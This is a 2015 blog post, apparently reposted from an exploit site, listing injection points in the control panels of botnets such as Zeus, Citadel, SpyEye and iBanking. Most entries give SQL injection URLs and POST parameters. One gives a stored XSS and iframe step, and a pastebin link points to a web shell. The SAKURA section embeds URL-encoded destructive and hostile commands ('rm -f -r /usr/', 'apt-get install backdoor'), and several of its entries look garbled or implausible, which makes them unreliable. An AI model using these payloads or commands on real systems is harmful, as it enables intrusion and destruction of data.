Tuesday, 3 February 2015
0 comments

Exploit - Several Botnet(s) Vulnerabilities

Exploit - Several Botnet(s) Vulnerabilities!

BotNets are Mainly Created by Great Scripters, but some of them really LACK on Security!
A recent report made to siph0n.in by abdilo and asterea (@4sterea) identified How Un-Secure the Most Recent Botnets are!

Let's give a look into it!

(1) BotNet is Vulnerable to Sh3ll Upload Vulnerability


iBanking
=============

Type: Shell Upload

Sh3ll: *(2)


(18) BotNets are VULNERABLE to SQL Injection:


 Random panel
==========

Type: SQLi
Vuln: http://site.com/g.php?id=1


 Athena
==========

Type: SQLi
Vuln: http://localhost:8992/panel/gate.php?botid=1&newbot=1&country=AUD&country_code=AUD &ip=10.0.0.1&os=win&cpu=amd&type=mate&cores=1999&version=88.8&net=wlan&admin=narwals&busy=no&lastseen=now


Casinoloader
==========

Type: SQLi
Vuln: http://localhost/gateway.php

POSTDATA page=1&val=1


 Citadel
==========

Type: SQLi
Vuln: http://localhost/cp.php?bots=1


 DLOADER
=============

Type: SQLi
Vuln1: http://localhost/includes/get_kktocc.php?line=1              
Vuln2: http://localhost/includes/update_url.php?fid=1


HERPES
=============

SQL injection.

http://localhost/tasks.php POST: vote=1&submitted=1


JACKPOS
=============

blindsqli after you login, pretty useless so i wont bother.


JHTTP
=============

Some sqlinjection vulnerabilities past the assets folder.


SAKURA
=============

Type: SQLi

http://localhost/func.php?showtopic=2 http://localhost/index.php?showtopic=322 http://localhost/sakuraadmin44.php?filename=1.png&cmd=rm%20-f%20-r%20%2Fusr%2F&edit=2312 http://localhost/sakuraadmin44.php?filename=1.png&cmd=apt-get%20install%20backdoor http://localhost/sakuraadmin44.php?link=http%3A%2F%2Fmetasploit.com%2F&threads=10 http://localhost/showthread.php?t=123 http://localhost/showthread.php?t=23&cmd=32

Type: SQLi - POST

http://localhost/sakuraadmin44.php?threads=222&link=21213.com POST: exploits=992.ds http://localhost/sakuraadmin44.php?threads=11 POST: snick=123&file=321&exploits=123 http://localhost/sakuraadmin44.php?threads=21 POST: snick=1


SILENCE WINLOCKER V5.0
=================

SQL injection.

http://localhost/forma.php?pin=4322 http://localhost/index.php?x=1&act=delete&id=1 http://localhost/picture.php?pin=8787 http://localhost/tmp/get.php?pin=1334


SMOKE LOADER
=============

Type: SQLi

http://localhost/control.php?id=1 http://localhost/guest.php?id=1

POST


SOLARBOT
=============

SQL injection.

localhost/index.php POSTDATA i=1881&p=80&u=8302&h=282&s=AUD


SPY-EYE
=============

Type: SQLi

http://localhost/frm_boa-grabber_sub.php?dt=11%2F11%2F1998


TINBA
=============

Type: SQLi

\tinybanker panel\admin/control/logs.act.php http://localhost/logs.act.php Post Data: bot_uid=1&botcomment=mate


UMBRA
=============

Type: SQLi

Vuln: http://localhost/delete_command.php?deleteID=1


VERTEXNET
=============

There are sqlinjection vulnerabilities but the likely hood of you actually finding a way of exploiting them is low.


ZEUS AND ZEUS EVO
=============

Type: SQLi

Vuln: http://localhost/gate.php?ip=8.8.8.8


ZSKIMMER
=============

Type: SQLi

Vuln: http://localhost/process.php?xy=2


(3) BotNets are VULNERABLE to Cross-Site Scripting Vulnerability and Other Medium Issues:


CYTHOSIA BOTNET
=============

Type: Stored XSS and iFrame redirect

Click add task Command: IFRAME SRC="whateverekorlemonpartyorwhatnot.com" /IFRAME 

Then Click Create Task Finally click Tasks. VOILA!

(Credits to asterea for finding this botnet panel)


CRIMEPACK 3.1.3
============

Secure shit, like no XSS's or anything.


PLASMA
=============

Some Cross site scripting vulns and nothing else so no use telling you about them.

Furthermore they have also identified (5) Secure Sh3lls :-)

Here you all can find the Secure Ones!


 Alin1
==========

Nothing, unless logged in.


 Betabot
==========

Nope.


 CRIMEPACK 3.1.3
============

Secure shit, like no XSS's or anything.


SMSBOT
=============

nothing interesting.


SPY POSCARDSTEALER
=============

nope its secure.

------------------------------------------------------------------------------

If you all find any new Vulnerability, you can directly contact them below!

Contact: [email protected]                          

Twitter: 4sterea

------------------------------------------------------------------------------

(*)1 Source:

https://siph0n.in/exploits.php?id=3528

(*)2 iBanking Sh3ll:

http://pastebin.com/Dfczctfv


About the Author :
Christian Galeone is a Cyber Security Researcher from Italy, he's currently studying to ITCL Marco Polo ( Vocational Technical Institute | Vo-Tech ) attending the IT Programming Class. 
He has been Acknowledged by the TOP 5 Companies including Yahoo!, Microsoft, AT&T, Sony etc. He is currently working with HOC as author of Cyber Security & Critical Tools Research Articles.

0 comments:

Post a Comment

 
Toggle Footer
Top